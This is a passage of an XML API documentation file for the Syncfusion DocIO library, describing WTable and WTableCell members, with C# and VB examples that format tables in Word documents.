        <member name="M:Syncfusion.DocIO.DLS.WTable.GetGridBeforeAfter(Syncfusion.DocIO.DLS.PreferredWidthInfo,System.Single)">
            <summary>
            Gets the grid before after.
            </summary>
            <param name="widthInfo">The width info.</param>
            <param name="tableWidth">Width of the table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetCellWidth(Syncfusion.DocIO.DLS.WTableCell,System.Single,System.Single,System.Single,System.Single,System.Boolean)">
            <summary>
            Gets the width of the cell.
            </summary>
            <param name="cell">The cell.</param>
            <param name="clientWidth">Width of the client.</param>
            <param name="tableWidth">Width of the table.</param>
            <param name="currOffset">The curr offset.</param>
            <param name="maxRowWidth">Width of the max row.</param>
            <param name="isTableGridMissMatch">if set to <c>true</c> [is table grid miss match].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetOwnerWidth">
            <summary>
            Gets the width of the table owner.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetTableClientWidth(System.Single)">
            <summary>
            Gets the width of the table client.
            </summary>
            <param name="clientWidth">Width of the client.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.UpdateTableGrid(System.Single)">
            <summary>
            Updates the table grid.
            </summary>
            <param name="currOffset">The current offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetNextTextBodyItem">
            <summary>
            Gets the next TextBodyItem in the document.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.UpdateFormat(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Updates the table format.
            </summary>
            <param name="propKey">The prop key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Close">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.UpdateWidth">
            <summary>
            Updates the width.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.GetOwnerSection">
            <summary>
            Get the section in which table is present
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.MakeChanges(System.Boolean)">
            <summary>
            Accepts or rejects changes tracked from the moment of last change acceptance.
            </summary>
            <param name="acceptChanges">if it accepts the changes, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.RemoveCFormatChanges">
            <summary>
            Removes the character format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.RemovePFormatChanges">
            <summary>
            Removes the table format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.AcceptCChanges">
            <summary>
            Accepts the changes for character format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.AcceptPChanges">
            <summary>
            Accept changes in table format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CheckChangedPFormat">
            <summary>
            Defines whether table format is changed.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CheckDeleteRev">
            <summary>
            Checks a value indicating whether this item was deleted from the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CheckInsertRev">
            <summary>
            Checks a value indicating whether this item was inserted to the document,
            when "Track Changes" is or was set to "true".
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CheckChangedCFormat">
            <summary>
            Defines whether table format was changed.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.HasTrackedChanges">
            <summary>
            Determines whether item has tracked changes.
            </summary>
            <returns>
            	if has tracked changes, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.RemoveChangedTable">
            <summary>
            Remove added/deleted table rows, while number of rows > 1.
            </summary>
            <returns>Value indicating whether to completely remove table</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.SetDeleteRev(System.Boolean)">
            <summary>
            Sets the delete revision for table.
            </summary>
            <param name="check">if it specifies the revision to delete, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.SetInsertRev(System.Boolean)">
            <summary>
            Sets the insert revision for table.
            </summary>
            <param name="check">if it specifies the revision for insertion, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.SetChangedCFormat(System.Boolean)">
            <summary>
            Sets the changed Character format for table.
            </summary>
            <param name="check">if it specifies format to be change, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.SetChangedPFormat(System.Boolean)">
            <summary>
            Sets the changed Paragraph format for table.
            </summary>
            <param name="check">if it specifies the format to be changed, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.IsHiddenRow(System.Int32,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Determine whether the current row is need to be hidden
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.IsHiddenParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determine whether the paragraph is Hidden 
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.IsHiddenTable(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Determine whether the table is hidden 
            </summary>
            <param name="table"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Syncfusion#Layouting#ITableWidget#GetCellWidget(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="row"></param>
            <param name="column"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Syncfusion#Layouting#ITableWidget#GetRowWidget(System.Int32)">
            <summary>
            
            </summary>
            <param name="row"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTable.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.Rows">
            <summary>
            Gets the rows collection that represent all the rows in the table. Read-only.
            </summary>
            <value>The collection of rows in the table.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.WRowCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WTableRow"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.TableFormat">
            <summary>
            Gets the table format. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.RowFormat"/> object that specifies the table format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.PreferredTableWidth">
            <summary>
            Gets the preferred width of the table.
            </summary>
            <value>The width of the preferred table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.StyleName">
            <summary>
            Gets the name of the table style. Read-only.
            </summary>
            <value>The <b>string</b> that specifies the style name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.LastCell">
            <summary>
            Gets the last cell in last row. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> object that represents the last cell.</value>
            <example>The following example illustrates how to get the last cell of the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Get the last cell
                WTableCell cell = table.LastCell;            
                //Apply text direction to the last cell
                cell.CellFormat.TextDirection = Syncfusion.DocIO.DLS.TextDirection.Vertical;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Get the last cell
                Dim cell As WTableCell = table.LastCell
                'Apply text direction to the last cell
                cell.CellFormat.TextDirection = Syncfusion.DocIO.DLS.TextDirection.Vertical
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.FirstRow">
            <summary>
            Gets the first row in table. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/> object that represents the first row in the table.</value> 
            <example>The following example illustrates how to get the first row of the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Get the last cell
                WTableRow row = table.FirstRow;            
                //Apply text direction to the last cell
                row.RowFormat.BackColor = Color.LightGray;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Get the last cell
                Dim row As WTableRow = table.FirstRow
                'Apply text direction to the last cell
                row.RowFormat.BackColor = Color.LightGray
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.LastRow">
            <summary>
            Gets the last row in table. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/> object that represents the last row in the table.</value> 
            <example>The following example illustrates how to get the last row of the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Get the last cell
                WTableRow row = table.LastRow;            
                //Apply text direction to the last cell
                row.RowFormat.BackColor = Color.LightGray;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Get the last cell
                Dim row As WTableRow = table.LastRow
                'Apply text direction to the last cell
                row.RowFormat.BackColor = Color.LightGray
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.Item(System.Int32,System.Int32)">
            <summary>
            Gets the table cell at the specified row and column index. Read-only.
            </summary>
            <param name="row">The <b>integer</b> that specifies the row index.</param>
            <param name="column">The <b>integer</b> that specifies the column index.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> object at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the table.</exception>
            <example>The following example illustrates how to get the cell in the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                //Add new table.
                IWTable table = section.AddTable();
                table.ResetCells(2, 2);
                //Add content to table cell
                table[0, 0].AddParagraph().AppendText("First row, First cell");
                table[0, 1].AddParagraph().AppendText("First row, Second cell");
                table[1, 0].AddParagraph().AppendText("Second row, First cell");
                table[1, 1].AddParagraph().AppendText("Second row, Second cell");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Horizontal merging of Table cells")
                'Add new table.
                Dim table As IWTable = section.AddTable()
                table.ResetCells(2, 2)
                'Add content to table cell
                table(0, 0).AddParagraph().AppendText("First row, First cell")
                table(0, 1).AddParagraph().AppendText("First row, Second cell")
                table(1, 0).AddParagraph().AppendText("Second row, First cell")
                table(1, 1).AddParagraph().AppendText("Second row, Second cell")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.Width">
            <summary>
            Gets the width of the table(in points).
            </summary>
            <value>The <b>float</b> that specifies the width of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.ChildEntities">
            <summary>
            Gets the child elements of the table.
            </summary>
            <value>The collection of child elements.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.TableGrid">
            <summary>
            Gets the table grid.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.IndentFromLeft">
            <summary>
            Gets or sets the indent from left for the table.
            </summary>
            <value>The <b>float</b> value that indicates the indent from left.</value>
            <example>The following example illustrates how to set the left indent for the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Set number of rows and columns
                table.ResetCells(2, 2);
                //Set left indent for table.
                table.IndentFromLeft = 10;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Set number of rows and columns
                table.ResetCells(2, 2)
                'Set left indent for table.
                table.IndentFromLeft = 10
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.DocxTableFormat">
            <summary>
            Gets or sets the docx table format.
            </summary>
            <value>The docx table format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.TrackTblFormat">
            <summary>
            Gets the old row format.
            </summary>
            <value>The old row format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.TrackTableGrid">
            <summary>
            Gets the track table grid.
            </summary>
            <value>The track table grid.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.ApplyStyleForHeaderRow">
            <summary>
            Gets or sets a value indicating whether to apply heading-row formatting to the first row of the table. 
            The default value is <b>true</b>.
            </summary>
            <value><b>True</b> if need to apply style for first row; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for header row of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Disable special formatting for header row of the table
                table.ApplyStyleForHeaderRow = false;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Disable special formatting for header row of the table
                table.ApplyStyleForHeaderRow = False
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.ApplyStyleForLastRow">
            <summary>
            Gets or sets a value indicating whether to apply last-row formatting to the last row of the specified table.
            </summary>
            <value><b>True</b> if need to apply style for last row; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for last row of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Enable special formatting for last row of the table
                table.ApplyStyleForLastRow = false;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Enable special formatting for last row of the table
                table.ApplyStyleForLastRow = True
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.ApplyStyleForFirstColumn">
            <summary>
            Gets or sets a value indicating whether to apply first-column formatting to the first column of the specified table. 
            The default value is <b>true</b>.
            </summary>
            <value><b>True</b> if need to apply style for first column; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for first column of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Disable special formatting for first column of the table
                table.ApplyStyleForFirstColumn = false;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Disable special formatting for first column of the table
                table.ApplyStyleForFirstColumn = False
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.ApplyStyleForLastColumn">
            <summary>
            Gets or sets a value indicating whether to apply last-column formatting to the last column of the specified table..
            </summary>
            <value><b>True</b> if need to apply style for last column; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for last column of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Enable special formatting for last column of the table
                table.ApplyStyleForLastColumn = true;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Enable special formatting for last column of the table
                table.ApplyStyleForLastColumn = True
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.ApplyStyleForBandedRows">
            <summary>
            Gets or sets a value indicating whether to apply style bands to the rows in a table, 
            if an applied preset table style provides style banding for rows. The default value is <b>True</b>.
            </summary>
            <value><b>True</b> if need to apply style for banded rows; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for banded rows of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Disable special formatting for banded rows of the table
                table.ApplyStyleForBandedRows = false;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Enable special formatting for banded rows of the table
                table.ApplyStyleForBandedRows = False
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.ApplyStyleForBandedColumns">
            <summary>
            Gets or sets a value indicating whether to apply style bands to the columns in a table, 
            if an applied preset table style provides style banding for columns.
            </summary>
            <value><b>True</b> if need to apply style for banded columns; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for banded columns of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Enable special formatting for banded columns of the table 
                table.ApplyStyleForBandedColumns = true;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Enable special formatting for banded columns of the table 
                table.ApplyStyleForBandedColumns = True
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.Title">
            <summary>
            Gets or sets the table title.
            </summary>
            <value>The <b>string</b> that specifies the title of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.Description">
            <summary>
            Gets or sets the table description.
            </summary>
            <value>The <b>string</b> that specifies the description of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.IsFrame">
            <summary>
            Gets a value indicating whether this instance is frame.
            </summary>
            <value><c>true</c> if this instance is frame; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.IsTableGridVerified">
            <summary>
            Gets or sets the a value indicating whether the table grid is updated when the width is not as expected.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.IsTableCellWidthDefined">
            <summary>
            Gets or sets a value indicating whether the cell width is defined when the table width type is None.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.IsUpdateCellWidthByPartitioning">
            <summary>
            Gets or sets a value indicating whether to update cell width by equally partitioning the available width among all the cells in a row.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.IsInCell">
            <summary>
            Gets a value indicating whether the current table is in cell. Read-only.
            </summary>
            <exclude/>
            <value><b>True</b> if this paragraph is in cell; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.Syncfusion#Layouting#ITableWidget#MaxRowIndex">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.Syncfusion#Layouting#ITableWidget#ColumnsCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTable.Syncfusion#Layouting#ITableWidget#RowsCount">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTableCell">
            <summary>
            Represents a table cell.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTableCell.m_cellFormat">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> class with the 
            specified <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.Clone">
            <summary>
            Creates a duplicate copy of the entity.
            </summary>
            <returns>The reference to the newly created cell.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetCellIndex">
            <summary>
            Returns the index of the cell in the table row.
            </summary>
            <returns>The zero-based index of the cell.</returns>
            <example>The following example illustrates how set get the index of the cell.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Find the text in the table
                TextSelection selection = table.Find(new Regex("Cell"));
                WTextRange text = selection.GetAsOneRange();
                //Get the owner paragraph
                WParagraph paragraph = text.OwnerParagraph;
                //Get the owner cell
                WTableCell cell = paragraph.OwnerTextBody as WTableCell;
                //Get the index of the cell
                int index = cell.GetCellIndex();
                //Apply text direction to the next cell
                cell = cell.OwnerRow.Cells[index + 1];
                cell.CellFormat.TextDirection = Syncfusion.DocIO.DLS.TextDirection.Vertical;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Find the text in the table
                Dim selection As TextSelection = table.Find(New Regex("Cell"))
                Dim text As WTextRange = selection.GetAsOneRange()
                'Get the owner paragraph
                Dim paragraph As WParagraph = text.OwnerParagraph
                'Get the owner cell
                Dim cell As WTableCell = TryCast(paragraph.OwnerTextBody, WTableCell)
                'Get the index of the cell
                Dim index As Integer = cell.GetCellIndex()
                'Apply text direction to the next cell
                cell = cell.OwnerRow.Cells(index + 1)
                cell.CellFormat.TextDirection = Syncfusion.DocIO.DLS.TextDirection.Vertical
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An <see cref="T:System.Object"/> that can be casted as table cell.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.IsCellWidthZero">
            <summary>
            Determines whether the width and preferred width of a cell is zero.
            </summary>
            <returns>True if cell width and preferred width is zero; Otherwise false.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.UpdateTablePreferredWidth(System.Single,System.Single)">
            <summary>
            Updates the width of the table preferred.
            </summary>
            <param name="prevWidth">Width of the prev.</param>
            <param name="newValue">The new value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.ApplyTableStyleBaseFormats(Syncfusion.DocIO.DLS.CellFormat,Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.WCharacterFormat,Syncfusion.DocIO.DLS.BodyItemCollection)">
            <summary>
            Applies the table style base formats.
            </summary>
            <param name="cellFormat">The cell format.</param>
            <param name="paraFormat">The para format.</param>
            <param name="charFormat">The char format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.CloneCell">
            <summary>
            Clones the cell.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTableCell.GetNextTextBodyItem">
            <summary>
            Gets the next TextBodyItem in the document 
            </summary>
            <returns></returns>
        </member>
